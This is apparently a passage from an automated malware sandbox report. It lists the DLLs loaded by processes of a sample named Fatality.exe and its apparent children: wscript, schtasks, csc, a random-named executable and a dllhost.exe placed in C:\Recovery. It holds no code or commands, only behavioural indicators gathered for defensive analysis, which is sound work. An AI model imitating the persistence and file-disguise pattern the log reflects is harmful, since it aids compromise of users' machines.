                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: version.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wldp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: profapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ktmw32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wbemcomn.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: amsi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: userenv.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: iphlpapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dnsapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winnsi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasapi32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasman.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rtutils.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mswsock.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winhttp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasadhlp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: fwpuclnt.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winmm.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winmmbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mmdevapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: devobj.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ksuser.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: avrt.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: audioses.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: powrprof.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: umpdc.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: edputil.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: msacm32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: midimap.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dwrite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windowscodecs.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ntmarta.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: version.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wldp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: profapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: mscoree.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: kernel.appcore.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: mscoree.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: kernel.appcore.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: version.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
